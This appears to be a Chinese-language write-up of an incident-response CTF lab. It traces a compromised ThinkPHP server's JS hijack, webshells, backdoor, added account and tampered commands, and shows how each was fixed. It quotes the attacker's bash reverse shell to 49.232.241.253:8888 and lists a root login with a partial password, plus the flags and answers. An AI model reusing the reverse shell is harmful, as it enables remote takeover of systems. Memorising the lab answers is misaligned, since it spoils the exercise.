服务器:139.196.218.29 账号:root 密码:qgQFmTaZrLERjtRaDnGP…
js劫持
获取js劫持域名(带https)
这个跳转的域名就是答案https://www.194nb.com
黑客首次webshell 密码
黑客首次webshell 密码,不加flag{}
QjsvWsp6L84Vl9dRTTytVyn5xNr1
黑客首次入侵方式
黑客首次攻击(非有效攻击)通过什么方式(如:文件上传、SQL注入、命令执行)
因为首个马在uploads文件夹下,猜测就是文件上传漏洞,但是不对,去看一下日志
xss
黑客服务器的信息
请找到黑客留下的后门中黑客服务器的ip及端口
访问发现是反弹的shell
root@iZuf6i9l9nqrfyk7eo6l0nZ:/var/log/nginx# cat /var/www/html/runtime/cache/1.sh
#!/bin/bash
bash -i >& /dev/tcp/49.232.241.253/8888 0>&1
49.232.241.253:8888
黑客的webshell2
提交黑客上传的第二个webshell内的flag
这里因为日志太多,一点一点翻很浪费时间,用自动分析日志的工具LogForensics.pl即可【在linux里面用】
使用方法:
Perl LogForensics.pl -file logfile -websvr (nginx|httpd) [-ip ip(ip,ip,ip)|-url url(url,url,url)]
File:日志文件路径
Websvr : 日志类型
Ip: 起始调查IP或ip列表,以逗号分割
url: 起始调查cgi 链接或链接列表,以逗号分割
usage:
LogForensics.pl -file logfile -websvr (nginx|httpd) [-ip ip(ip,ip,ip)|-url url(url,url,url)]
root@iZuf6i9l9nqrfyk7eo6l0nZ:/var/log/nginx# ./LogForensics.pl -file ./access.log -websvr nginx
Web log forensics
ver2014102301 by xti9er
[*] ip=NULL url=NULL
[*] PRELOAD ./access.log Plz wait
[*] LOAD ./access.log.db
[!] ip + 59 & url + 6 and go on
[*] Export report... Plz wait
[*] All Done in 2 s , ip[1] url[6]
1.php就是第二个马
flag{5t945bbwxokj87f1ucjb2vc7zdnf8ix3}
mysql
修复mysql可getshell漏洞
先得连上数据库,找配置文件,这种可以先全局搜一下database.php,config.php等等关键词文件
/var/www/html/application/database.php
回收用户file权限并且关闭全局日志
revoke file on *.* from 'root'@'localhost';
set global general_log = off;
flush privileges;
黑客的账号
找到黑客添加的账号并删除
aman删除
userdel aman
黑客篡改的命令1
修复黑客篡改的命令并且删除篡改命令生成的免杀马
删除替换
rm ps
mv ps_ ps
rm ls
mv ls2 ls
rm /var/www/html/public/static/img/1.php
修复JS劫持
修复JS劫持
最慢的当然就是一点一点找了,或者用find命令
root@iZuf6i9l9nqrfyk7eo6l0nZ:/var/www/html# find . | xargs grep -ri '<script type="text/javascript">' -l | sort | uniq -c
6 ./application/home/view/public/js.html
4 ./runtime/temp/7989650828d8c92a2cbbbcbe7c322c03.php
4 ./runtime/temp/ba0546f2ed29bcb24fbace34b295ef45.php
4 ./thinkphp/tpl/dispatch_jump.tpl
4 ./thinkphp/tpl/page_trace.tpl
删除俩马和恶意代码即可修复
root@iZuf6i9l9nqrfyk7eo6l0nZ:/var/www/html# rm ./runtime/temp/ba0546f2ed29bcb24fbace34b295ef45.php
root@iZuf6i9l9nqrfyk7eo6l0nZ:/var/www/html# rm ./runtime/temp/7989650828d8c92a2cbbbcbe7c322c03.php